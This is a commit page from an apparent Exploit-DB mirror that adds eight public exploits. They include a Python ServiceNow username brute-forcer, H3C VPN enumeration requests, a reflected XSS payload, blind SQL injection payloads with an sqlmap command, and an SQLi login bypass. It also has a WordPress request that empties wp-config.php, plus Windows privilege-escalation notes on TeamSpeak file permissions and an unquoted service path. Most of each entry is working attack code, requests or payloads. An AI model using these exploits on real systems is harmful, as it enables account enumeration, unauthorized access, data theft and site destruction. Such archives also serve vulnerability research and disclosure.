bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-02-17

Browse source 
8 changes to exploits/shellcodes

TeamSpeak 3.5.6 - Insecure File Permissions
Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path

H3C SSL VPN - Username Enumeration
Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
ServiceNow - Username Enumeration
Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
This commit is contained in:
Offensive Security 2022-02-17 05:01:36 +00:00
parent 07b4b32301
commit a300bd948f
9 changed files with 454 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

68
exploits/hardware/remote/50742.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: H3C SSL VPN - Username Enumeration
# Exploit Author: LiquidWorm
H3C SSL VPN Username Enumeration
Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
Product web page: https://www.h3c.com
Affected version: n/a
Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees
to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a
new generation of professional SSL VPN devices for enterprises. They can function as ingress
gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are
for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized
enterprises.
Desc: The weakness is caused due to the login script and how it verifies provided credentials. An
attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName'
POST parameter.
Tested on: ssl vpn gateway HttpServer 1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5697
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php
24.01.2022
--
Non-valid:
----------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">User is not exist</TD></TR>
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">Input password incorrect</TD></TR>
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">Local user state is inactive</TD></TR>

13
exploits/hardware/webapps/50744.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A
# Proof of Concept:
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

151
exploits/multiple/webapps/50741.py Executable file
View file

@ -0,0 +1,151 @@
# Exploit Title: ServiceNow - Username Enumeration
# Google Dork: NA
# Date: 12 February 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2021-45901/
# Vendor Homepage: https://www.servicenow.com/
# Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html
# Version: Orlando
# Tested on: MAC OSX
# CVE : CVE-2021-45901
#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# User enumeration script SNOW
# Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token
import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
print ("[+]********************************************************************************[+]")
print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")
print ("| Decription: SNOW Username Enumerator |")
print ("| Usage : "+sys.argv[0]+" |")
print ("| Prequisite: \'users.txt\' needs to contain list of users |")
print ("[+]********************************************************************************[+]")
def main():
os.system('clear')
banner()
proxies = {
"http":"http://127.0.0.1:8080/",
"https":"http://127.0.0.1:8080/"
}
url = "http://<redacted>/"
try:
# s = requests.Session()
# s.verify = False
r = requests.get(url, timeout=10, verify=False, proxies=proxies)
JSESSIONID = r.cookies["JSESSIONID"]
glide_user_route = r.cookies["glide_user_route"]
startTime = (str(time.time_ns()))
# print (startTime[:-6])
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except requests.exceptions.ProxyError:
print ("[!] Can't communicate with proxy !")
sys.exit(1)
with open ("users.txt", "r") as f:
usernames = f.readlines()
print (f"[+] Brute forcing ....")
for users in usernames:
url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default"
headers1 = {
"Host": "<redacted>",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Cookie": "glide_user_route="+glide_user_route+"; JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime[:-6]+"\'"
}
try:
# s = requests.Session()
# s.verify = False
r = requests.get(url, headers=headers1, timeout=20, verify=False, proxies=proxies)
obj1 = re.findall(r"pwd_csrf_token", r.text)
obj2 = re.findall(r"fireAll\(\"ck_updated\"", r.text)
tokenIndex = (r.text.index(obj1[0]))
startTime2 = (str(time.time_ns()))
# userTokenIndex = (r.text.index(obj2[0]))
# userToken = (r.text[userTokenIndex+23 : userTokenIndex+95])
token = (r.text[tokenIndex+45:tokenIndex+73])
url = "http://<redacted>/xmlhttp.do"
headers2 = {
"Host": "<redacted>",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Content-Length": "786",
"Origin": "http://<redacted>/",
"Connection": "keep-alive",
# "X-UserToken":""+userToken+"",
"Cookie": "glide_user_route="+glide_user_route+";JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime2[:-6]+"\'"
}
data = {
"sysparm_processor": "PwdAjaxVerifyIdentity",
"sysparm_scope": "global",
"sysparm_want_session_messages": "true",
"sysparm_name":"verifyIdentity",
"sysparm_process_id":"c6b0c20667100200a5a0f3b457415ad5",
"sysparm_processor_id_0":"fb9b36b3bf220100710071a7bf07390b",
"sysparm_user_id_0":""+users.strip()+"",
"sysparm_identification_number":"1",
"sysparam_pwd_csrf_token":""+token+"",
"ni.nolog.x_referer":"ignore",
"x_referer":"$pwd_reset.do?sysparm_url=ss_default"
}
payload_str = urllib.parse.urlencode(data, safe=":+")
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
try:
# s = requests.Session()
# s.verify = False
time.sleep(2)
r = requests.post(url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies)
if "500" in r.text:
print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)
f = open("enumeratedUserList.txt", "a+")
f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)
f.close()
elif "200" in r.text:
print (Fore.GREEN + f"[+] Valid user: {users.strip()}" + Style.RESET_ALL)
f = open("enumeratedUserList.txt", "a+")
f.write(Fore.GREEN + f"[+] Valid user: {users.strip()}\n" + Style.RESET_ALL)
f.close()
else:
print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)
f = open("enumeratedUserList.txt", "a+")
f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)
f.close()
except KeyboardInterrupt:
sys.exit()
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except Exception as e:
print (Fore.RED + f"Unable to connect to host" + Style.RESET_ALL)
if __name__ == "__main__":
main ()

29
exploits/php/webapps/50739.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Vulnerable Code
line 2 in file "mvogms/products/view_product.php
$qry = $conn->query("SELECT p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");
# Sqlmap command:
sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
# Output:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=products/view_product&id=3' AND 9973=9973-- ogag
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ

45
exploits/php/webapps/50740.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
# Vulnerable Code
line 57 in file "/sqgs/Actions.php"
@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
Steps To Reproduce:
* - Go to the login page http://localhost/sqgs/login.php
Payload:
username: admin ' or '1'='1'#--
password: \
Proof of Concept :
POST /sqgs/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/sqgs/login.php
Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

45
exploits/php/webapps/50746.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
# Description:
Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!
I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.
An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.
# Steps To Reproduce
1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.
# PoC - Supported Materials
---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]
rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------

60
exploits/windows/local/50743.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
# Date: 2022-02-15
# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo.com
# Vendor Homepage: https://www.teamspeak.com
# Software Link: https://www.teamspeak.com/en/downloads
# Version: 3.5.6
# Tested on: Windows 10 x64
# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
#application for audio communication between users on a chat channel,
#much like a telephone conference call, Users typically use headphones with a microphone,
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
#with other players on the same team of a multiplayer video game,
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.
# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary.
# [ POC ]:
C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
error_report.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
package_inst.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
update.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
Successfully processed 7 files; Failed processing 0 files
# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)

35
exploits/windows/local/50745.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.80 Build 8695
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """
Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto
# Service info:
C:\>sc qc TrapiServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TrapiServer
TYPE : 120 WIN32_SHARE_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Trapi File Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

8
files_exploits.csv
View file

@ -11439,6 +11439,8 @@ id,file,description,date,author,type,platform,port
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows,
50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
50743,exploits/windows/local/50743.txt,"TeamSpeak 3.5.6 - Insecure File Permissions",1970-01-01,"Aryan Chehreghani",local,windows,
50745,exploits/windows/local/50745.txt,"Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18607,6 +18609,7 @@ id,file,description,date,author,type,platform,port
50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows,
50688,exploits/windows/remote/50688.txt,"Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion",1970-01-01,"Jonah Tan",remote,windows,
50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44813,3 +44816,8 @@ id,file,description,date,author,type,platform,port
50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
50736,exploits/php/webapps/50736.txt,"Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,php,
50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",1970-01-01,"Aryan Chehreghani",webapps,php,
50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",1970-01-01,"Saud Alenazi",webapps,php,
50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",1970-01-01,"Saud Alenazi",webapps,php,
50741,exploits/multiple/webapps/50741.py,"ServiceNow - Username Enumeration",1970-01-01,"Victor Hanna",webapps,multiple,
50744,exploits/hardware/webapps/50744.txt,"Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
50746,exploits/php/webapps/50746.txt,"WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,

Can't render this file because it is too large.